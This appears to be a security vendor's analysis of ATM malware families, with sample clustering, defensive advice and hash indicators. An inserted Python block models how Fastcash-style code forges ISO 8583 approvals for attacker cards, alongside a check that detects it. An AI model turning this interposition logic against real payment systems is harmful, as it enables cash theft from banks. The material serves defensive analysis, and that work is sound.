Over time, actors behind some of the newer ATM malware families such as GreenDispenser and Tyupkin realized that there is a generic Windows extension for Financial Services API (CEN/XFS) that can be used to make malware that runs independently of the underlying hardware platform, as long as the ATM manufacturer supports the framework. This malware can trick the machines into dispensing cash, regardless of whether the attacker has a legitimate bank card.

ATM malware has evolved to include a number of different families and different actors behind them, ranging from criminal groups to actors affiliated with nation states. The significance of ATM malware stems from the fact that it can bring significant financial benefits to attackers and, as a consequence, cause significant damage to targeted banks, financial institutions and end users.

Now that this type of malware has been around for more than 10 years, we wanted to round up the specific families we've seen during that time and attempt to find out if the different families share any code.

ATM malware overview

Significance

ATM malware provided criminals with a subtler alternative to physically breaking into the safe built into the ATM. Before the appearance of ATM malware, criminals typically had to employ traditional ways of robbing ATMs, often pulling the physical device out of the ground or blowing it to pieces with dynamite. Obviously, these methods would quickly draw the attention of law enforcement and passersby.

Over the past 10 years, we have seen a steady increase in the number of ATM malware samples discovered. Still, the number of discovered samples is very small compared to almost any other malware category.


Number of ATM malware samples discovered year over year based on the year of first submission to VirusTotal.

As a digital substitute for dynamite, ATM malware allows criminals to employ money mules and instruct them how to dispense money from targeted ATMs. Typically, it happens by supplying a special authorisation code or card created to authorise the transaction.

Before that, criminals had to infect the targeted ATM to install the code, which more often than not meant that they had to physically open the device to access its optical media reading devices or USB ports.

There have been many reported attacks on various banking organizations throughout the world, but they seem to be more prevalent in Latin America and Eastern Europe, where the ATM infrastructure is older and is not regularly updated with security software or tamper-proof sensors. The damage caused by ATM malware to banks and individuals is rarely disclosed, but it likely reaches millions of dollars a year.

ATM malware affects banks and other financial institutions, as well as the reputation of ATM manufacturers and individuals and companies whose account details are stolen in ATM malware attacks.

Classification

There are several different ways we can classify ATM malware families. Based on its functionality, we can classify ATM malware into virtual skimmers and cash dispensers. The purpose of skimmers is to steal card and transaction details, and individual PINs if the encryption keys used by the PIN pad are successfully retrieved.

Cash-dispensing malware uses functions that allow for so-called "jackpotting" of ATMs, where money is dispensed by attackers without authorisation from the bank. There are also malware families that do both: steal card details and dispense cash.

As far as the installation process is concerned, we again have two major groups. The first one requires the attacker to physically access the device. The second group assumes that the attacker installs malware indirectly, typically by compromising the internal network of the bank and then targeting ATMs using stolen credentials.

ATM malware also either targets specific models of ATMs or is more generic. Recent ATM malware typically relies on generic functions.

The most common framework is the CEN/XFS framework, which allows the developers of ATM applications to compile and run their code regardless of the ATM model or the manufacturer, but there are others, such as the Kalignite framework, which is built on top of XFS.

The XFS API contains high-level functions for communicating with the various ATM modules, such as the cash dispensing module (CDM), PIN pad (EPP4) or printer. The high-level functions are provided through a generic SDK, while the lower-level functions, supplied through service providers, are developed by ATM manufacturers. The architecture is quite similar to the Win32 architecture, where developers use the high-level API to communicate with the OS kernel and the various device drivers provided by the manufacturers of the individual hardware components.

High-level CEN/XFS architecture.

Most ATM malware samples require physical access to the targeted ATM. ATMs are not typically connected to the internet and communicate with the bank's central systems through specialized lines. However, most ATMs are connected to internal networks for their maintenance and administration, so the second, smaller group of ATM malware may be introduced by compromising the internal network first. This technique requires a higher level of sophistication but potentially brings higher returns if successful.

Some generic hacking tools, such as Cobalt Strike, have reportedly been used for attacking ATMs and the transaction systems. This method has been more commonly used by more advanced groups such as Carbanak, Cobalt Gang and Lazarus (Group 77), whose Fastcash attack affects the IBM AIX operating system, which is rarely targeted by malware.

Notable ATM malware families and their functionality

Over the past 10 years, we have seen more than 30 different ATM malware families. In this section, we will briefly describe some of the more notable ones.

Number of ATM malware samples per family.

Ploutus

Ploutus is the malware family with the largest number of discovered samples. The majority of them have been reported in Mexico. Ploutus is a standard ATM-dispensing malware. The attackers need to be able to access physical ports or a CD-ROM drive to be able to boot from it and modify the ATM system image to install the malware.

Attackers allegedly used newer Ploutus variants to attack some U.S.-based ATMs. Ploutus.D communicates with the ATM using the multi-vendor KAL Kalignite framework, which allows it to work with ATMs from different vendors with minimal changes to its code base.

The interface of one Ploutus variant.

Skimer

Skimer is one of the first ATM attacks, and bears all of the features of well-developed malware. Skimer functions as a virtual skimming device that attempts to steal bank card numbers and the account and owner details stored on magnetic stripe tracks 1 and 2. A recent review of its functionality also indicates that it may attempt to steal users' PINs by retrieving the encrypted PIN pad encryption keys from the system.

Apart from the virtual skimming function, Skimer acts as a backdoor to the ATM functionality for its operators — money mules employed to collect stolen data and dispense cash.

Main code loop for servicing Skimer's operators with cash.

If the user knows the secret code to activate the backdoor, the malware displays a menu, which allows the operator to empty one of the four cash-dispensing modules (CDMs).

The code locking the dispenser module and dispensing cash.

Most other ATM malware families follow a similar principle. The attackers need physical access to the ATM, which requires a key or drilling a hole to reach specific ports or devices. Once the malware is deployed, the money mules need a specific code to access the menu and dispense cash.

Tyupkin (Padpin)

Tyupkin's most interesting characteristic is its ability to limit its operation to specific hours and days of the week. Some Tyupkin instances were reported to work only on Sunday and Monday nights.

Tyupkin function for checking the hours of operation.

Before dispensing cash, Tyupkin disables all network connections, presumably to prevent administrators from shutting down the ATM remotely if suspicious activity is detected.

Some members of the Tyupkin family are developed in C# on the .NET Framework and others in Microsoft Visual C++. The family uses the XFS API to control infected ATMs and dispense cash in multiple currencies. Tyupkin has been active since 2014, and the associated gangs reportedly target Eastern European countries.

Alice

Alice follows a similar pattern to other ATM malware: it is installed by attackers with physical access to the system. When the operator launches it, Alice displays a window requiring a PIN.

First Alice screen.

If the code is correct, Alice accesses the dispenser module and allows the operator to retrieve cash.

Main Alice UI window.

Cutlet

Cutlet, or Cutlet Maker, has been sold as a do-it-yourself ATM malware kit on underground markets since 2016. The bundle contains detailed instructions in Russian and English on how to infect systems and how to acquire the codes required to dispense cash.

Main Cutlet Maker user interface.

The Cutlet manual details the operational security practices needed to avoid being caught by law enforcement and shows where to drill holes in the enclosure of a specific ATM model to reach its USB ports. The kit also contains a testing application named "Stimulator" that lets buyers practice before conducting real attacks.

Cutlet follows a similar pattern to the previous ATM malware. The owner of the kit has the ability to generate codes per ATM required for its operation.

Fastcash

The significance of Fastcash lies in its mode of operation and its targeting of the IBM AIX operating system. Fastcash consists of a process injector and shared objects, presumably injected into the process space of compromised bank payment authorization systems. The malware monitors ISO 8583 transactions using code from a fairly old open-source library for parsing ISO 8583 packets.

If an ATM transaction contains the attackers' codes, the data is not forwarded to the original payment authorization application; instead, a transaction approval is sent back to the target ATM, allowing the attackers to dispense cash.
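To make that interposition concrete, here is an added example in Python. It is not Fastcash code and not the open-source ISO 8583 library mentioned above; it uses a deliberately simplified, assumed wire encoding (ASCII fields, a four-digit MTI, a primary bitmap only, two-digit length prefixes for variable-length fields). Field numbers follow the ISO 8583 standard (2 PAN, 3 processing code, 4 amount, 11 STAN, 39 response code, 41 terminal ID); modelling the "attackers' codes" as a list of card numbers is an assumption. The last function is the check a defender would want from this description: approved responses seen on the wire toward ATMs whose STAN the authorization host never logged, because the host never saw the intercepted request.

```python
"""Added example: a toy model of Fastcash-style interposition on an
ISO 8583 authorization path, plus a reconciliation check to detect it.
Not Fastcash code; the wire encoding below is a simplified assumption."""
from typing import Dict, Iterable, List, Optional, Set, Tuple

# Assumed, simplified field layout: ("LLVAR", max) or ("FIXED", length), ASCII.
FIELD_SPEC = {
    2: ("LLVAR", 19),   # PAN
    3: ("FIXED", 6),    # processing code, 01xxxx = cash withdrawal
    4: ("FIXED", 12),   # amount, minor units
    11: ("FIXED", 6),   # STAN (system trace audit number)
    39: ("FIXED", 2),   # response code, "00" = approved
    41: ("FIXED", 8),   # terminal ID
}


def build(mti: str, fields: Dict[int, str]) -> str:
    """Serialise MTI + 64-bit primary bitmap + fields (bit i set <=> field i present)."""
    bitmap, body = 0, ""
    for i in sorted(fields):
        kind, length = FIELD_SPEC[i]
        value = fields[i]
        if kind == "LLVAR":
            if len(value) > length:
                raise ValueError(f"field {i} too long")
            body += f"{len(value):02d}{value}"
        else:
            if len(value) != length:
                raise ValueError(f"field {i} must be {length} chars")
            body += value
        bitmap |= 1 << (64 - i)
    return f"{mti}{bitmap:016X}{body}"


def parse(msg: str) -> Tuple[str, Dict[int, str]]:
    """Inverse of build(); rejects a secondary bitmap, which this toy does not model."""
    mti, bitmap, pos = msg[:4], int(msg[4:20], 16), 20
    if bitmap >> 63:
        raise ValueError("secondary bitmap not supported")
    fields: Dict[int, str] = {}
    for i in range(2, 65):
        if not (bitmap >> (64 - i)) & 1:
            continue
        kind, length = FIELD_SPEC[i]
        if kind == "LLVAR":
            n = int(msg[pos:pos + 2]); pos += 2
            fields[i] = msg[pos:pos + n]; pos += n
        else:
            fields[i] = msg[pos:pos + length]; pos += length
    return mti, fields


def interpose(request: str, attacker_pans: Set[str]) -> Tuple[bool, Optional[str]]:
    """What the injected hook does: forward normal requests untouched, but answer
    requests for the attackers' cards locally with an approval (0210, field 39 = 00)
    so the real authorization host never sees them. Returns (forward?, response)."""
    mti, f = parse(request)
    if mti == "0200" and f.get(2) in attacker_pans:
        response = {k: f[k] for k in (2, 3, 4, 11, 41) if k in f}
        response[39] = "00"
        return False, build("0210", response)
    return True, None


def unmatched_approvals(wire_responses: Iterable[str], host_logged_stans: Set[str]) -> List[str]:
    """Defender's check: approved responses seen on the wire toward ATMs whose STAN
    is absent from the authorization host's own transaction log."""
    found = []
    for raw in wire_responses:
        mti, f = parse(raw)
        if mti == "0210" and f.get(39) == "00" and f.get(11) not in host_logged_stans:
            found.append(f[11])
    return found


# Constructed sample traffic (not from any real campaign).
ATTACKER_PANS = {"9999000000000001"}
LEGIT_REQUEST = build("0200", {2: "4111111111111111", 3: "010000",
                               4: "000000050000", 11: "000123", 41: "ATM00001"})
MULE_REQUEST = build("0200", {2: "9999000000000001", 3: "010000",
                              4: "000000050000", 11: "000124", 41: "ATM00001"})


def demo() -> Tuple[bool, bool, List[str]]:
    """Returns (legit forwarded?, mule forwarded?, STANs the host never saw)."""
    legit_fwd, _ = interpose(LEGIT_REQUEST, ATTACKER_PANS)
    mule_fwd, mule_resp = interpose(MULE_REQUEST, ATTACKER_PANS)
    host_log = {"000123"}  # the host only ever processed the legitimate transaction
    wire = [build("0210", {**parse(LEGIT_REQUEST)[1], 39: "00"}), mule_resp]
    return legit_fwd, mule_fwd, unmatched_approvals(wire, host_log)


if __name__ == "__main__":
    print(demo())  # (True, False, ['000124'])
```

The reconciliation in `unmatched_approvals` works because the hook answers the mule's request without the host ever processing it, so the approval exists on the ATM-facing link but not in the host's log; comparing the two feeds by STAN is therefore a cheap way to surface this class of tampering on a real switch, independent of the encoding details assumed here.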

This mode of operation resembles some rootkits, which hide their presence by modifying the responses the operating system returns to applications that enumerate system objects such as files or processes, removing the names of the malware's own files or processes from the returned list.

Fastcash has been attributed to the Lazarus Group and is an example of a nation-state-related actor targeting financial systems for financial gain. Fastcash shows a level of sophistication and knowledge not seen in other, run-of-the-mill ATM malware.

Code sharing between families

Thanks to Xylitol and the ATM Cybercrime Tracker, it was easy to retrieve a fairly complete ATM malware data set, to which we added the few files connected with the Fastcash campaign.

The data set contains 121 files and is well suited for analysis and clustering. Of the 121 files, 114 are PE files, and those were used for clustering with static analysis techniques. Of the 114 PE files, 37 are packed, which makes them less suitable for static analysis, and 20 are DLLs.

While investigating clustering methods, we came across an interesting book, "Malware Data Science" by Joshua Saxe and Hillary Sanders, which presents basic and more advanced methods for classifying and clustering malicious files. We used some of its ideas to cluster our own set.

In our case, the clustering was conducted by extracting the following attributes from each sample:
  • Strings extracted from the file
  • Disassembled code from the entry point of the file
  • File entropy and the presence of a known packer
  • Imported or exported functions
  • Embedded resources
After collecting the attributes, the Jaccard index is calculated for every pair of files in the set. The Jaccard index of two sets is the size of their intersection divided by the size of their union, a number between 0 and 1; the Jaccard distance is 1 minus the index. The more similar two samples are, the higher their Jaccard index. An index of 0.5, for example, means that half of the attributes in the union of the two sets are shared by both.

Clusters with Jaccard index threshold of 0.7.

We then set the threshold a pair of samples must reach to be connected as part of a single cluster. The higher the Jaccard threshold, the more closely related the members of a cluster will be, and by varying the threshold we arrive at the value best suited to our purpose. For example, for correct classification of samples into families a threshold above 0.7 is appropriate, while for finding code sharing between families a threshold above 0.3 is enough.

As expected, the results show that as we lower the threshold, more samples become connected and some clusters span distinct ATM malware families.

Clusters with Jaccard index threshold of 0.3.

The width of the lines in the graph shows how strongly the files in a cluster are related. For example, the members of the individual GreenDispenser, Tyupkin and DispCash clusters are very closely related, while the mixed Ligsterac/Skimer, Tyupkin/DispCash and ATMtest/HelloWorld clusters show weaker connections that likely indicate some overlap in the malware code.
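The clustering procedure described above, as an added example in Python (not the tooling used for this analysis and not code from "Malware Data Science"): one attribute set per sample, the Jaccard index for every pair, and connected components of the similarity graph cut at a chosen threshold. The attribute sets are constructed by hand to stand in for the extracted strings, entry-point disassembly, imports, packer flag and resources; the sample names carry illustrative family labels, and real attribute extraction (strings, pefile, a disassembler) is out of scope here.

```python
"""Added example: clustering malware samples by the Jaccard index of their
static attribute sets, then cutting the similarity graph at a threshold.
Not the tooling used for the article; the attribute sets are constructed."""
from itertools import combinations
from typing import Dict, List, Set, Tuple

# Constructed attribute sets. Prefixes mark the attribute type the text lists:
# str: (strings), ep: (entry-point disassembly), imp: (imports),
# res: (resources), packed: (known packer). Family labels are illustrative.
SAMPLES: Dict[str, Set[str]] = {
    "tyupkin_a": {"str:CDM", "imp:msxfs.dll", "imp:WFSOpen", "imp:WFSExecute",
                  "ep:push ebp", "ep:mov ebp, esp", "res:RT_VERSION", "str:Sunday"},
    "tyupkin_b": {"str:CDM", "imp:msxfs.dll", "imp:WFSOpen", "imp:WFSExecute",
                  "ep:push ebp", "ep:mov ebp, esp", "res:RT_VERSION", "str:Monday"},
    "dispcash_a": {"str:CDM", "imp:msxfs.dll", "imp:WFSOpen", "imp:WFSExecute",
                   "ep:push ebp", "ep:sub esp, 0x40", "str:Dispense"},
    "skimer_a": {"str:Track2", "imp:msxfs.dll", "imp:WFSGetInfo", "ep:push ebp",
                 "res:RT_DIALOG", "packed:UPX"},
    "ligsterac_a": {"str:Track2", "imp:msxfs.dll", "imp:WFSGetInfo", "ep:push ebp",
                    "ep:mov ebp, esp", "str:PIN", "res:RT_ICON", "str:ServiceMain"},
}


def jaccard_index(a: Set[str], b: Set[str]) -> float:
    """|A ∩ B| / |A ∪ B|, in [0, 1]; 1.0 means identical attribute sets."""
    if not a and not b:
        return 1.0
    return len(a & b) / len(a | b)


def jaccard_distance(a: Set[str], b: Set[str]) -> float:
    """Dissimilarity on the same scale: 0.0 identical, 1.0 nothing in common."""
    return 1.0 - jaccard_index(a, b)


def similarity_edges(samples: Dict[str, Set[str]], threshold: float) -> List[Tuple[str, str, float]]:
    """Every pair whose index reaches the threshold, as (a, b, index)."""
    edges = []
    for a, b in combinations(samples, 2):
        j = jaccard_index(samples[a], samples[b])
        if j >= threshold:
            edges.append((a, b, round(j, 2)))
    return edges


def cluster(samples: Dict[str, Set[str]], threshold: float) -> List[Set[str]]:
    """Connected components of the thresholded similarity graph (union-find)."""
    parent = {name: name for name in samples}

    def find(x: str) -> str:
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    for a, b, _ in similarity_edges(samples, threshold):
        parent[find(a)] = find(b)
    groups: Dict[str, Set[str]] = {}
    for name in samples:
        groups.setdefault(find(name), set()).add(name)
    return sorted(groups.values(), key=min)


def families_per_cluster(clusters: List[Set[str]]) -> List[List[str]]:
    """Family label is the part before '_' in each sample name; a cluster
    with more than one label is where code sharing between families shows up."""
    return [sorted({name.split("_")[0] for name in c}) for c in clusters]


if __name__ == "__main__":
    for t in (0.7, 0.3):
        print(f"threshold {t}: {families_per_cluster(cluster(SAMPLES, t))}")
```

At 0.7 only the two Tyupkin samples join, so every cluster is a single family; at 0.3 the Tyupkin/DispCash pair (index 0.5) and the Skimer/Ligsterac pair (index 0.4) connect, which is the kind of cross-family edge the 0.3 graph above is meant to expose. On the real set the weak links should be inspected by hand, since shared library or packer artifacts can also push the index over a low threshold.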

Protection and detection best practices

When considering protection and detection of attacks with ATM malware, it is important to consider the physical security of ATMs, the security of software running on the system and the security of any segment of the organization's network that communicates with ATMs.

Here are 15 best practices that organizations should follow when considering the protection of ATM networks and the successful and timely detection of attacks when they happen.
  • Ensure ATMs and all related systems run up-to-date software and the latest operating system versions with the latest security patches applied.
  • Disable Windows AutoPlay and configure BIOS to disable the ability to boot software from USB sticks and CD/DVD drives. Set strong BIOS password protection to prevent boot settings from being changed.
  • Disable access to the Windows desktop at the ATM, and secure any RDP sessions with multiple authentication factors, for example Duo Authentication for Windows Logon and RDP.
  • Remove any unused services and applications from the system to reduce the attack surface. Implement other measures to harden the underlying ATM operating system.
  • Monitor the operation of ATMs, as well as their physical integrity. Look for unusual patterns of resets, communication failures and transaction volume.
  • Implement strong encryption between the ATM and the host.
  • Ensure access to the ATM cabinet is restricted to authorized persons and that such access is electronically logged.
  • Perform a security assessment of ATMs, including their physical locations and any networks connecting to them.
  • Ensure that firewalls and anti-malware protection are correctly configured.
  • Configure application whitelisting solutions or operating system features so that only known, trusted software can run. Make sure that whitelisting cannot be disabled without generating a remote log entry.
  • Prevent unauthorized USB devices from being installed using a device control function.
  • Educate employees about how they can avoid introducing malware into operational systems.
  • Maintain a physically and logically segmented network environment throughout the organization using segmentation technology such as Cisco TrustSec.
  • Ensure visibility of network traffic to ATM systems and payment authorization servers using technology that enhances network visibility, such as Cisco Stealthwatch.
  • Monitor threat intelligence feeds to learn about newly detected ATM malware threats.

Conclusion

ATM malware is a niche area of attacks, but it potentially brings significant rewards to actors who successfully manage to deploy it. In the 10 years since the discovery of the first specialized malicious code targeting the Diebold Agilis line of ATMs, we have seen over 30 other malware families with varying degrees of sophistication, complexity and success. Most successful attacks are reported in countries where ATMs are older, such as some Latin American and Eastern European countries.

While the majority of actors behind ATM malware appear to be less sophisticated criminals, the prospect of dispensing large amounts of cash also attracts more sophisticated criminal groups such as Carbanak and Cobalt Gang, as well as state-sponsored actors such as Lazarus.

Although the number of known ATM malware samples is very low, the number of discovered samples has increased steadily year over year.

Financial organizations and banks have to be particularly vigilant when considering protection against malware targeting ATMs and payment systems. Enterprises and individuals may also suffer financial loss if their card details are used for fraudulent transactions after being skimmed by ATM malware. Best practices should be followed to ensure the highest possible level of protection, and organizations should invest in raising user awareness of the dangers of ATM malware.

Coverage

Additional ways our customers can detect and block these threats are listed below.


Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. Below is a screenshot showing how AMP can protect customers from this threat. Try AMP for free here.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IOCs

SHA256

Alice

04f25013eb088d5e8a6e55bdb005c464123e6605897bd80ac245ce7ca12a7a70
23c50f1c37b7c55554c282ba1781e9d6279cbbd7bfc5f64772d2e7a8962ebe70
b8063f1323a4ae8846163cc6e84a3b8a80463b25b9ff35d70a1c497509d48539
db1169df116fda46319c4b87607df7b6a5e80b48de5411d47684974ca22dd35a
e3bf733cc85da7421522a0b1ff788d43bcacd02815a88d19426e80de564174b3

ATMii

0ef71569308d44e89bde48096c67caf73ec177c1c970a2fd843fd3a094502d78
5f5d483c1fcd1638b32d11183c5ed5fd36362fb12d62e1d9940b47906733d672
7fac4b739c412b074ee13e181c0900a350b4df9499515febb75008e6955b9674
d74cbd2e39dc0a00dc4c0fb0823c5a86455cdad2be48d32866165c9e5557c3e0

DIAGK

03bb8decefc540bff5b08425adddb404b345452c8adedee0c8af13572891865b

Cutlet

05fae4bef32daf78a8fa42f8c25fdf481f13dfbbbd3048e5b89190822bc470cd
4a340a0a95f2af5ab7f3bfe6f304154e617d0c47ce31ee8426c70b86e195320c
c18b23cc493f89d73a2710ebb177d54beafe0edf0e17cc79e28d9efdfb69a630
d1a0b2a251fa69818784e8937403c18f09b2c37eead80ba61a3edf4ac2b6b7ff
d4a463c135d17239047ad4151ab2f2d084e223970e900904ecedabc0fd916545
fe1634318e27e3af856506d49a54d1d12e1cf650cbc31eeb0c805949edc8fc85

Piolin

5f4215368817570e7a390c9f6e265a7db343c9664d22008d5971dac707751524

Prilex

d10a0e0621a164fad0d7f3690b5d63ecb9561e5ad30a66f353a98395b774384e

WinPot

0720db2469a61d41c1e67a8f32020927a32422a5d58067bb328a2ff407e14e98
3f5ff48aa4dc2c1af3deeb33a9cc576616dad37156ae9182831b1b2a5ae4ae20
a5d0cd1bc33f44d25695ebd6530757180f4fc4d87a1658ee2f0d8fc42d09fb80
c3a5c8e9195163cef8e0e70bd8f3d49c8048e37af7c969341e1753aee63df0ae
d9c6515fd0fb3cd14b4bb4d11ecda78602d17f370780a4b9ee006a9830106213

ATMitch

1065502d7171df7be3776b839410a227c540cd977e5e856bbbcd837b0872bdb6
ea5ebd1e5f98e10b1e7c834dd54707ad06772bccb4179cae7e50c7e6e772a1ab

ATMtest

9f8a7828d833ed7f28f9f5ceaf1c073c6de0645172b8316d86edc16c84b61c4f

ATMWizX

7bd2c97ac5027c360011dc5aa8f2371cd934f73e885e41f7e80152332b3af1db
a4b42f503090cd3cd53963ddaf0be3e4eeedbd81ff02664668e68612816e727f

Ploutus

0106757fac9d10a8e2a22dce5337f404bfa1c44d3cc0c53af3c7539888bc4025
04db39463012add2eece6dfe6f311ad46b76dae55460eea30dec02d3d3f1c00a
0971c166826163093093fb199d883f2544055bdcfc671e7789bd5088992debe5
0e37b8a6711a3118daa1ce2e2f22c09b3f3c6179155b98215a1d96a81c767889
34acc4c0b61b5ce0b37c3589f97d1f23e6d84011a241e6f85683ee517ce786f1
398e335f2d6379771d86d508a43c567b4156104f89161812005a6122e9c899be
62b61f1d3f876300e8768b57d35c260cfc60b768a3e430725bd8d2f919619db2
7fd109532f1e49cf074be541df38e0ce190497847fdb5588767ca35b9620a6c2
aee97881d3e45ba0cae91f471db78aded16bcff1468d9e66edf9d3c0223d238f
c8d57b32ab86a3a97f89ae7f1044a63cca2b58f748bed250a1f9df5c50fc8fbb
d93342bd12ef44d92bf58ed2f0f88443385a0192804a5d0976352484c0d37685
d99339d3dc6891cdd832754c5739640c62cd229c84e04e9e3cad743c6f66b1b9
e75e13d3b7a581014edcc2a397eaffbf91c3e5094d4afd81632d9ad872f935f4

Suceful

c7cb44e0b075cbc90a7c280ef8f1c69e8fe06e7dabce054b61b10c3105eda1c4
d33d69b454efba519bffd3ba63c99ffce058e3105745f8a7ae699f72db1e70eb

Tyupkin

16166533c69f2f04110e8b8e9cc45ed2aeaf7850fa68845c64d92ff907dd44f0
3639e8cc463922b427ea20dce8f237c0c0e82aa51d2502c48662e60fb405f677
639d2d926325275cb023014d0b446d03f1dcc8526bff1aa72373e27d78a6a674
646433de5c56fdbc7e6e934a05e9e99012ef39a0ed6cc4bdb1d984cd4435379e
6c59cd1e12bc1037031af48b934e9398fc85efb2a067d03b6a100dd8423e5d9b
853fb4e85d8b0ad7c156ad6d3fc4b0340c8b29fa0548a3df758e7845ba8b23ae
8bb5c766de0a73dc0eff7c9fce086565b6220465185e258c21c5b9dfb0bef51d
b670fe2d803705f811b5a0c9e69ccfec3a6c3a31cfd42a30d9e8902af7b9ed80

SkimerWC

dff7ee95100ffaec5848a73a7b306eaaee94ae691dfccff9fe6ce0a8f3b82c56
e267fb3044c31256f06dd712c7aeae97ad148fd3157995a7e536e5473c1a2bc0
e78e6155b8dfd206ba5a5e7253409891bfed1b943d217e0fbc416a25fa761580

ATMitch.B

66db5b6b5dc51de7e5380f214f703bdc69ab3c3bec7c3b67179940a06560f126

ATMripper

21f3c0bf3fc05685ec5b7bf3c98103761894d7c6783c2c12afae958eb103598e
22db6a994eb057715b499c5641cc608fb0380aeea25f78180436c35ecd81ce7d
3d8c7fb9e55f96cf3073b321ee5e59ff2189d70b0662bc0b88990971bc8b73d8
4c98d5cd865d7fe2f293862fae42895045e43facfdd2a3495383be4ddbb220dc
64499b2584d239380ffecf07e94167e0414c4bb5438620659fe37d595ef3f361
cc85e8ca86c787a1c031e67242e23f4ef503840739f9cdc7e18a48e4a6773b38
e3a6970d66bc4687b21381353826fabd469007c869efc711fdd0e4711aa77ffc

Ligsterac

1243c478a7145fa08a03200611fcf5fae9bb58039c5069ef93e150d53cf22524
377f85562e9ec16cae8fed87e43b6dd230eaa6e1c8f2732f5096f1ec951f045a
aaeee605cb1850dd81da8990fe4115fe85e5d4eb84ddaf2fa8d0b21afdc2b293
b361963fe11b149afc526a6e0656c08226f943bdba0f2c7c0a7640fba09afce8
e130bc1603893155d87946a430b6d6ad167760cde24aa2834c61dd0eace30e8e

NeoPocket

85652bbd0379d73395102edc299c892f21a4bba3378aa3b0aaea9b1130022bdd

Atmosphere

26b2daa6fbf5ec13599d24e6819202ddb3f770428d732100be15c23be317bd47
5c838658b25d44edab79a4bd2af7c56bef96768b93addbbaaaea36da604fca62
956968e6f4bf611137ea0e747891ba8dc200ca809c252ef249294912fb3dbe3c
a6c33d7275c46397593f53ea136ea8669794f4d787044106594631c07a9ee71d
d60126545fa68b14c36cd4cffa3f81ed487381482582acbba786fa88884f636b
eeb8390e885612e1f0b8f8922baa4ebc9ba420224b30370d08b45f3453949937

ATMSpitter

4035d977202b44666885f9781ac8755c799350a03838ff782eb730c0d7069958
85e5aacbc9113520d93f1d9d73193c3501ebab8032661052d9a66348e204cde6
8770f760af320d30681a4eb4ded331eab2481f54c657aac607df8babe8c11a6b
bf20c674a0533e7c0d825de097629a96cb42ae2d4840b07dd1168993d95163e8
c5b43b02a62d424a4e8a63b23bef8b022c08a889a15a6ad7f5bf1fd4fe73291f
e372631f96face11e803e812d9a77a25d0a81fa41e4ac362dc8aee5c8a021000
f27e27244233f2bb5b02412d4b05315625928adaa340708e91d61ad3bce54bf6

HelloWorld

2de4a510ee303c04c8d7bd59b7987b22c3471c9f4ba69b5f83ba36de88b63a8d
867991ade335186baa19a227e3a044c8321a6cef96c23c98eef21fe6b87edf6a
f6609bb3c3197ace26ebdeb372ba657ac84b05a3e9e265b5211e1ea42da70dbe

Java/Dispcash

0149667c0f8cbfc216ef9d1f3154643cbbf6940e6f24a09c92a82dd7370a5027
ef407db8c79033027858364fd7a04eeb70cf37b7c3a10069a92bae96da88dfaa

Trojan.Skimer

2721a5a6478bfff2c5de0d105623ba5f411401bbd92bd3e2bee4c51c2d12f5a8
4941331c64e0389d5ec966122ef71a99d8f9830f13e9afa758e03275f896c2eb
5ab6358e1886655257c437ebad71b98a6575313b2f9327359661aac5d450c45a
653701d02c5d8d39b3da9b0848d20921cd65ea28e77c8e9254e222601264bcc6
d90257af70401984d5d41dd057114df88566d00329874ced3103a6f8cd1991e5

GreenDispenser

20a1490b666f8c75c47b682cf10a48b7b0278068cb260b14d8d0584ee6c006a5
50db1f5e9692f217f356a592e413e6c9cb31105a94efc70a5ca1c2c73d95d572
5a37be2d298145b766ba54616677d802cfabc62e3b9be2ffb6d4719d3f8143e9
7544e7a798b791cb36caaa1860974f33d30bc4659ceab3063d1ab4fd71c8c7e0
77850f738ba42fd9da299b2282314709ad8dc93623b318b116bfc25c5280c541
b7e61f65e147885ec1fe6a787b62d9ee82d1f34f1c9ba8068d3570adca87c54f

ATM.DispCash.3

622d7489208578eaaaae054a07e16b4b8c91a3fde6e61d082a09aee5a1b1f829
b00cd2ca5247c93e3a40f73006051bbfada3b1bc73c4d44105384824bb60131d
b66615b186bf7067cdb937220f86b1d9411351e0b06ee8d02cf6c5358348e884
9feea4b7a5b438335353bb4eac82f8f2a16232a90b7cddbf77dc73dd451e9a6e
6efedf9bde951ad6c3e240ec498767bb693ecc8fa62040e624c5a7fa21c5bdaa

Trojan.Fastcash

d465637518024262c063f4a82d799a4e40ff3381014972f24ea18bc23c3b27ee
ca9ab48d293cc84092e8db8f0ca99cb155b30c61d32a1da7cd3687de454fe86c
10ac312c8dd02e417dd24d53c99525c29d74dcbc84730351ad7a4e0a4b1a0eba
3a5ba44f140821849de2d82d5a137c3bb5a736130dddb86b296d94e6b421594c

Skimer

34e7060e7a0c0ba24fcb55c641e5b586cef744e10ebd5a9f73ecd2ed2f4e9c1f
b51973c530802ae19df8ac4d9643fc3317952242d9d42f951e094c72d730dd66
359bb8596e4befafdaca706630bec598400694305622c116acdfa59074f1858e
ac8e8216e71e078198ef67d4cb48118767d0696610a02137492814422153d3c6
7888e9a27b27f026f09997414504be5822f35b69ddec826eb2a56f6347e2d147
cde6f7fb2fbdefffe22a012295ab157cffc07cab26ba0e34ced0bae484355187
b39c5992c2cb70c76c82d6fba3cc0b7972c2f9b35227934b766e810f20a5f053

WinPotv3

009b677564b3ebb0831171edf3fb0deb0fa3b0010b74586e01d8df4af965ef3f
1d6508cbe5f7ccaa991572f05aef52bab8a59851ca9a4367605a9637b10ae081
20fb2edfcece271f87d006e263c4a6de48ed518901211a76dc38aac43e1b9d19
6670ccc940cca6983340dbce1a9bbce7b49643ac924e18ca25def8b632b70720
70cc5070ce058682c1d44cef887c0ec8a50dba6b717802c5a8f2c8f2ed377c13
8d7f932d8236671018c5cd02781301134aa6df315253f7a56559350d2616ff8e
b57bc410683aba4c211e407320e6b7746ce25e06d81ddf480711228efd921a6c
e2c87bca353016aced41305ddd66ee7430bf61a20c0f4c8c0f0650f006f05160


Threat Source newsletter (May 30)

Newsletter compiled by Jonathan Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

